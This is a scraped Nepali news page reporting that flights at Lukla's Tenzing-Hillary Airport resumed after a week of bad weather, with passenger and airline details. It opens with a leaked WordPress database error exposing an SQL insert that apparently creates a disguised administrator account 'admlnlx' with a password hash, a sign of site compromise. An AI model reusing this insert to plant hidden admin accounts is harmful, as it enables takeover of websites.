WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BozUEPZrGTw6OSc8/kSlxOBj.05211/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 00:59:57', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, ५ असार, सोलुखुम्बु । खुम्बु पासाङल्यामु गाउँपालिका स्थित तेन्जीङ हिलारि विमानस्थलमा सात दिन पछि उडान भएको छ । जेष्ठ ३० गतेदेखि मौसम खराबीको कारण अबरुद्ध विमानस्थलमा बुधबार उडान भएको हो ।
मौसममा सुधार भएपछी बुधबार तारा यएरको ३ वटा र समिट यएरको २ वटा गरि ५ उडान भएको लुक्ला एयर्पोटले जनाएको छ । उक्त्त दिन पनि विहानको समयमा मात्र उडान भएको थियो । दिउसो १२ बजेसम्म उडान भएको र त्यस पछि मौसममा खरावि आए पछि पुन उडान रोकिएको तेन्जिङ हिल्लारी बिमान स्थलका प्रमखु इमानाथ अधिकारीले जानकारी दिए ।
७ दिन समय सम्म उडान नभएकोले यात्रुहरु खरिखोलासम्म पैदाल यात्रा गरी गाडिबाट काठमाण्डौ फर्किएकोले यात्रुको चाप कम भएको तारा यएरलाइन्सका स्टेशन इन्चार्ज अमृत मगरले बताए ।
लामो समय पछी भएको उडानमा बुधबारमात्र ४५ जना यात्रु काठमाडौ फर्किएका छन् । अहिले खुम्बु क्षेत्रमा केहि मात्रामा यात्रुहरु रहेको यएरलाइन्स कम्पनिहरुले जनाएका छ । सिजन सकिएकाले मौसम खराबि हुदा ठूलो समस्या नआउने विमानस्थल कार्यालयको जनाएको छ ।
https://gaulenews.com/?p=46818
https://gaulenews.com/?p=46611